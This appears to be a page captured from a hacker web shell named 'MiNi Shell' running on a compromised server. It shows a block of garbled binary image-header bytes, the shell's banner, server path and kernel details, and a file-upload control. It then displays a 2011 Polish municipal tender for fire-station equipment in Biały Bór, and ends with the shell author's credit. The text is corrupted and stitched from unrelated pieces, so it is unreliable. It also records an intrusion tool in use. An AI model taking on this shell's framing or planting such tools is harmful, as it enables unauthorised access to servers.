JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111004/261457-N-2011.html

<p class="kh_header"><b>Biały Bór: Rozbudowa i nadbudowa budynku remizy strażackiej OSP w Białym Borze wraz z wyposażeniem - dostawa i montaż wyposażenia specjalistycznego</b><br>
<b>Numer ogłoszenia: 261457 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biały Bór , ul. Żymierskiego 10, 78-425 Biały Bór, woj. zachodniopomorskie, tel. 094 3839002, faks 094 3739745.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bialybor.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i nadbudowa budynku remizy strażackiej OSP w Białym Borze wraz z wyposażeniem - dostawa i montaż wyposażenia specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa wraz z montażem urządzeń i wyposażenia specjalistycznego na potrzeby remizy strażackiej OSP w Białym Borze.
2.	Przedmiot zamówienia obejmuje: 
1)	Część I - Dostawa i montaż fabrycznie nowej elektronicznej syreny alarmowej wraz z blokiem sterującym, modernizacja stacji obiektowej DSP-52BS, montaż terminalu GSM  DTG-53 oraz przeniesienie istniejącego systemu powiadamiania - kpl. 1,
2)	Część II - Dostawa i montaż urządzeń odsysania spalin boksów garażowych oraz stanowiska remontowego - kpl. 1,
3)	Część III - Dostawa suszarni do ubrań, szafkowa - szt. 1,
4)	Część IV - Dostawa pralki przemysłowej o wsadzie min 8 kg - szt. 1,
5)	Część V - Dostawa myjki ciśnieniowej na gorącą wodę - szt. 1,
6)	Część VI - Wyposażenie pozostałe:
a.	Dostawa szafek ubraniowych dwusegmentowych - szt. 10,
b.	Dostawa regałów na węże strażackie - szt. 2 (typ mobilny),
c.	Dostawa i montaż masztu flagowego aluminiowego wys. 10 m - szt. 1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o informacje  zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o informacje  zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o informacje  zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o informacje  zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/ w oparciu o informacje  zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bialybor.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białym Borze,78-425 Biały Bór, ul. Żymierskiego 10, pokój nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2011 godzina 10:30, miejsce: Urząd Miejski w Białym Borze, 78-425 Biały Bór, ul. Żymierskiego 10, Biuro Obsługi Interesanta, pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Dostawa i montaż fabrycznie nowej elektronicznej syreny alarmowej wraz z blokiem sterującym, modernizacja stacji obiektowej DSP-52BS, montaż terminalu GSM  DTG-53 oraz przeniesienie istniejącego systemu powiadamiania - kpl. 1,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Syrena elektroniczna o mocy min 900 W, zasilanie główne 230V, zasilanie awaryjne z akumulatorów, natężenie SPL powyżej 110 dB/30, wykonana ze stopu lekkiego z blokiem sterującym.
Wyposażenie zestawu:
-	Maszt do montażu na dach płaski o wysokości 1500 mm (do 8 głośników),  na prędkość wiatru < 200 km/h,
-	Zadajnik prądowy o zakresie 4-20 mA,
-	Moduł sterujący pracą syreny w radiowym systemie RSSS-2000/3000 funkcjonującym w sieciach alarmowania Zarządzania Kryzysowego (pełna kompatybilność):
-	interfejs do sterowania syreną
-	dedykowane wejścia DKF, DKA
-	napięcie zasilania 12VDC
-	pobór prądu maks. 40mA
-	Radiotelefon VHF
Min parametry techniczne radiotelefonu:
-	128 kanałów VHF/UHF FM
-	krok 5/6,25/10/12,5/25 kHz
-	moc 5W-4W-1W
-	FM Radio tylko odbiór
-	wyświetlacz LCD z pomiarem baterii
-	50 tonów CTCSS (enkoder/dekoder) 106 tonów DCS
-	funkcja powiadomienia Alert, monitor, kablowe kopiowanie danych
-	funkcja nadawania VOX z ustawieniem poziomu czułości
-	nazwy kanałów/funkcje identyfikacji ANI/ograniczenia czasu nadawania TOT
-	Skaner kanałów priorytetowych/ Blokada zajętego kanału
-	podwójny wyświetlacz dla VHF i UHF
-	ogranicznik zużycia baterii, powiadomienie o wyczerpaniu baterii
-	programowanie z klawiatury
-	wejście na mikrofono-słuchawkę
-	giętka wytrzymała antena
-	temperatura pracy - 20/+60 st. C
-	Manipulator
-	przeznaczony do powieszenia na ścianie
-	do włączania syreny głównej
-	możliwość obsługi min 8 różnych makr (komunikatów dźwiękowych)
-	podświetlane klawisze i ekran
-	Antena VHF o charakterystyce dookolnej, długości 1.5m, zysku 3.5 dB,
-	Czujnik faz
-	czujnik przeznaczony do montażu na szynie DIN
Modernizacja istniejącej stacji bazowej DSP-52BS.
Montaż terminala GSM DTG-53.
Przeniesienie istniejącego systemu powiadamiania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.70.00.00-3, 35.24.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Dostawa i montaż urządzeń odsysania spalin boksów garażowych oraz stanowiska remontowego - kpl. 1,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Dostawa i montaż  szynowego systemu odsysania spalin szt. 3 - boksy garażowe
System odsysania przeznaczony dla samochodów ciężarowych z bocznym wylotem spalin. Zgodnie z rysunkami i rzutami hali należy zainstalować na trzech stanowiskach szynowy system odsysania spalin. Stanowiska należy wyposażyć w kanały o długości min 7,5 mb. Po jednym kanale będzie się poruszał jeden wózek odsysacza spalin ze ssawką elektromagnetyczną (zgodnie z załączonym rys. rozmieszczenia wyciągów). Wyczep ssawek automatyczny w okolicach bramy garażowej.
-	Dostawa i montaż stacjonarnego odsysacza spalin szt. 1 - stanowisko remontowe
Na tym stanowisku należy zamontować stacjonarny odsysacz spalin dla samochodów ciężarowych, o długości przewodu min 5m, zakończony ssawką do wyczepu ręcznego.
-	Wykonanie instalacji wyciągowej z wyprowadzeniem spalin ponad dach
-	Montaż wentylatora na dachu wraz z podstawą
-	Podłączenie automatyki
Wszystkie stanowiska odciągu spalin należy przewidzieć jako do podłączenia zbiorczego, tj. jednego wentylatora dachowego, który zostanie zamontowany na dachu remizy, na cokole i podstawie dachowej. Wentylator mocą należy dobrać dla jednoczesnej pracy wszystkich stanowisk, dodatkowo należy uwzględnić opory na obejściach podciągów. Przewody należy poprowadzić pod stropem garażu do szybu suszenia węży i nim wyjść ponad dach. W kalkulacji montażu należy uwzględnić przebicie otworów przez strop z płyt kanałowych oraz stropodach z płyt korytkowych (rzuty pięter i przekroje w załącznikach). Włączanie wentylatora ręczne, wyłączanie automatyczne. W celu ograniczenia poziomu hałasu wewnątrz pomieszczeń garażowych instalację wyrzutu spalin należy wyposażyć w tłumiki hałasu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.52.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Dostawa suszarni do ubrań, szafkowa - szt. 1,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka urządzenia: 
-	Suszarka wieszakowa przeznaczona do suszenia ubrań specjalnych (kurtka i spodnie) w stanie rozwieszonym. 
-	Urządzenie fabrycznie nowe. 
-	Suszarka przystosowana do suszenia min 3 kompletów ubrań specjalnych jednocześnie. 
-	Czynnik suszący - ciepłe powietrze. 
-	Suszarka ma umożliwiać suszenie ubrań nasączonych środkami łatwopalnymi. 
-	Komora grzewcza odizolowana od pozostałych komór suszących. 
-	Panel sterowania łatwo dostępny z możliwością nastawienia czasu suszenia, regulacją temperatury suszenia, regulacją obrotów wentylatora, wyposażony w wyłącznik główny zasilania. 
-	Zasilanie elektryczne 230 V, moc zainstalowana od 1,5 do 3 kW
-	Zakres regulacji temperatury -  do 1000C. 
-	Urządzenie wykonane w kształcie szafy posiadające wyodrębnioną komorę suszarniczą.
-	Samoczynne zabezpieczenia termiczne p. poż. - 2 szt. 
-	Zabezpiecz. konstrukcji - blacha ocynk, lakier elektrostatyczny - proszkowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Dostawa pralki przemysłowej o wsadzie min 8 kg - szt. 1,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka urządzenia: 
-	Pralka ładowana od frontu, fabrycznie nowa
-	Sterowanie: elektroniczne 
-	Wsad: min 8 kg 
-	Pojemność bębna min 80 l 
-	Wirowanie Prędkość: min 1000 obr/min 
-	Automatyka wagowa (dobór odpowiedniej ilości wody potrzebnej do prania)
-	Zużycie energii do 3 kWh 
-	Klasa energetyczna: min A 
-	Moc całkowita: 2 kW 
-	Napięcie: 230 V lub 400 V
-	Faktor G: min 300 
-	Szuflada na detergenty 
-	Drzwi wsadowe min O 350 mm 
-	Podest do pralki opcjonalnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.32.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V - Dostawa myjki ciśnieniowej na gorącą wodę - szt. 1,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka urządzenia: 
-	Urządzenie fabrycznie nowe
-	Zasilanie: 230 lub 400 V
-	Wydajność tłoczenia: 300÷500 l/s lub większe 
-	Ciśnienie: 30÷150 bar lub większe
-	Temperatura grzania wody 130/80 oC
-	Funkcja wyboru ciepłej lub zimnej wody
-	Funkcja regulacji temperatury wody
-	Pompa aluminiowa
-	Tłoki ceramiczne
-	Długość węża wysokociśnieniowego min 10m
-	Długość węża doprowadzającego wodę min 20m z kompletem szybkozłączek
-	Pistolet spryskujący z systemem tłumienia drgań, możliwością regulacji ciśnienia i wydatku wody
-	Dodatkowo dysza rotacyjna ceramiczna, dysza prosta, obrotowa szczotka myjąca
-	Czujnik temperatury
-	Podgrzewanie wody kocioł na olej opałowy lub napędowy
-	Zintegrowany lub dołączalny zbiornik na środek czyszczący
-	Zestaw środków czyszczących zalecanych przez producenta (pojemniki min na dwa uzupełnienia zbiorników).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.99.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI - Wyposażenie pozostałe:
a.	Dostawa szafek ubraniowych dwusegmentowych - szt. 10,
b.	Dostawa regałów na węże strażackie - szt. 2 (typ mobilny),
c.	Dostawa i montaż masztu flagowego aluminiowego wys. 10 m - szt. 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Dostawa szafek ubraniowych dwusegmentowych - szt. 10,
Charakterystyka urządzenia: 
-	Szafki ubraniowe przeznaczone do przechowywania ubrań specjalnych (kurtka i spodnie) w stanie rozwieszonym.
-	Szafki dwusegmentowe fabrycznie nowe w kolorze czerwonym. 
-	Wieniec dolny szafy wykonany z blachy stalowej gr. 1,5 mm z siedziskiem wykonanym z listew drewnianych, pozostałe elementy z blachy gr. 1,0 mm.
-	Skrytki zamykane zamkami cylindrycznymi ryglowanymi w jednym punkcie. 
-	Pod skrytką półka z drążkiem ubraniowym min z trzema przesuwnymi zawiesiami. 
-	Na wieńcu górnym montowany uchwyt do hełmu. 
-	Dolny prześwit umożliwiający ustawienie obuwia z wysokimi cholewami (np. gumowce).
b.	Dostawa regałów na węże strażackie - szt. 2 (typ mobilny),
a.	1 szt. - na węże strażackie typ W-52
b.	1 szt. - na węże strażackie typ W-75
Charakterystyka urządzenia: 
-	Urządzenie fabrycznie nowe. 
-	Wykonanie stal ocynkowana lub stopy lekkie
-	Półki min 3 szt. 
-	Na regale możliwość ułożenia jednocześnie min 24 węży
-	Koła stalowe ogumowane
-	1 para kół stała, druga obrotowe z blokadą
c.	Dostawa i montaż masztu flagowego aluminiowego wys. 10 m - szt. 1
Charakterystyka urządzenia: 
-	Maszt albuminowy stożkowy w kolorze biało czerwonym z linką znajdującą się w środku rury masztowej zamykanej na zamek.
-	Produkt fabrycznie nowy.
-	Grubość ścianki masztu min 3 mm. 
-	Zwieńczenie głowicą obrotową z mosiężną kulą. 
-	Ekspozycja flagi uzależniona od warunków wiatrowych. 
-	Maszt mocowany w fundamencie betonowym za pomocą tulei. 
-	Zabezpieczenie przed wyciągnięciem masztu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com